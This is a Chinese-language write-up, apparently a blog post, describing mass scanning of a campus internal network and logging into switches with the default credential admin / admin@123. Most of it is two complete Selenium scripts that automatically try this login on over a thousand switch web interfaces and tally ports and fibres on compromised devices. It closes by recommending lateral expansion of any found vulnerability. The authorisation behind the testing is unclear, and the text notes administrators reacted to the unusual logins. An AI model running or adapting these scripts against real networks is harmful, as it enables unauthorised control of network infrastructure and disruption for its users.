某校区大范围交换机弱口令调查记录

1. 前言

在某次例行的测试中发现某交换机存在弱口令，进行横向测试时发现影响范围较广，遂有此报告。本次受影响的交换机有 620 台，涉及主机 4362 台，光缆 865 条。对学校整体具有较大的威胁性。

本文仅作复盘记录，请勿将其用于违法行为。

2. 探测过程

对校内 10 段内网地址进行大规模扫描发现有 1124 个交换机的相关接口

在进行弱口令的尝试过程中发现 admin admin@123 可以成功登陆，且拥有对交换机整体的控制权

基于横向渗透的思想，我们对上述得到的交换机地址都用这个账号密码进行爆破

由于在写爆破脚本的时候ssl连接一直会出现问题。最后不得不放弃了requests直接发包的方式，而是使用了selenium来帮助我们完成工作

最后我们的脚本如下：

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.select import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from lxml import etree
import time
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.chrome.options import Options
from queue import Queue
import threading



options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')

with open(r"C:\Users\shinelon\Desktop\summary.txt",encoding="UTF-8") as f:
    urls= f.read().splitlines()

q = Queue(maxsize=0)
for each in urls:
    q.put(each)

def try_vuln(browser):
    while True:
        if q.empty():
            break
        url = q.get()
        url = url.split()[3]
        try:
            browser.get(url)#打开浏览器预设网址
            time.sleep(1)
            if "/simple/view/login.html" in browser.current_url:
                print("Find: "+ browser.current_url)
            else:
                continue

            time.sleep(3)
            result = alert_is_present()(browser)
            if result:
                result.accept()

            locator = (By.ID, 'UserName')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            locator = (By.ID, 'userPassword')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            locator = (By.ID, 'goBtn')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            browser.find_element_by_id("UserName").send_keys("admin")
            # 输入密码
            browser.find_element_by_id("userPassword").send_keys("admin@123")

            browser.find_element_by_id("goBtn").click()

            time.sleep(3)
            data = browser.page_source

            if "LSW" in browser.title:
                print("Success :" + url)
        except:
            pass


def scan_all():
    for index in range(1):
        browser=webdriver.Chrome(options=options)
        th = threading.Thread(target=try_vuln,args=(browser,))
        th.start()


class alert_is_present(object):
    """ Expect an alert to be present."""

    """判断当前页面的alert弹窗"""
    def __init__(self):
        pass

    def __call__(self, driver):
        try:
            alert = driver.switch_to.alert
            return alert
        except Exception:
            return False

if __name__ == '__main__':
    scan_all()

最后，我们得到了如下的结果：

之后对脚本进行改动，对这些交换机进行详细信息的记录，估计影响范围

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.select import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from lxml import etree
import time
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.chrome.options import Options
from queue import Queue
import threading
from lxml import etree


fiber_count = 0
port_count = 0

options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')

with open(r"C:\Users\shinelon\Desktop\tmp\switch_vuln_total.txt",encoding="UTF-8") as f:
    urls= f.read().splitlines()

q = Queue(maxsize=0)
for each in urls:
    q.put(each)

def try_vuln(browser):
    global fiber_count
    global port_count
    while True:
        if q.empty():
            break
        url = q.get()
        try:
            browser.get(url)#打开浏览器预设网址
            time.sleep(2)
            result = alert_is_present()(browser)
            if result:
                print("found tanchuang and click!")
                result.accept()

            locator = (By.ID, 'UserName')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            locator = (By.ID, 'userPassword')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            locator = (By.ID, 'goBtn')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))

            browser.find_element_by_id("UserName").send_keys("admin")
            time.sleep(0.5)
            # 输入密码
            browser.find_element_by_id("userPassword").send_keys("admin@123")
            time.sleep(0.5)
            browser.find_element_by_id("goBtn").click()
            time.sleep(15)
            data = browser.page_source
            html = etree.HTML(data)
            html_data = html.xpath('//table[@class="portPanelTable"]//img/@src')
            for each in html_data:
                count1 = each.find("fiber_green")
                count2 = each.find("port_green")
                if count1!=-1:
                    fiber_count +=1
                if count2!=-1:
                    port_count +=1

            print("The current affected port is " + str(port_count))
            print("The current affected fiber is " + str(fiber_count))
        except:
            pass


def scan_all():
    for index in range(8):
        browser=webdriver.Chrome(options=options)
        th = threading.Thread(target=try_vuln,args=(browser,))
        th.start()


class alert_is_present(object):
    """ Expect an alert to be present."""

    """判断当前页面的alert弹窗"""
    def __init__(self):
        pass

    def __call__(self, driver):
        try:
            alert = driver.switch_to.alert
            return alert
        except Exception:
            return False

if __name__ == '__main__':
    scan_all()

运行结果如下：

可以看出受影响的主机为 4362 台，总共接入光纤有 865 条。算是一个比较严重的结果。

3. 后记

在对数据进行统计的过程中发现有些交换机的密码被改了，应该是管理员发现登录的 IP异常并做了相应的修改口令的操作。

即上述统计出来的数据涉及到的交换机数应少于620 台。若是发现当时就进行统计结果只会更加惊人。

一开始的 1124 条交换机记录是通过大规模的内网探测抓取出来的。对大范围的内网进行探测所带来的弊端就是为了效率可能需要牺牲一些精确度。也就是存在少部分的带有弱口令的交换机没有被扫出来。

4.总结

在进行SRC挖掘和渗透测试的过程中，当挖到一个特定的漏洞时可以尝试对其进行横向拓展。往往会有意想不到的惊喜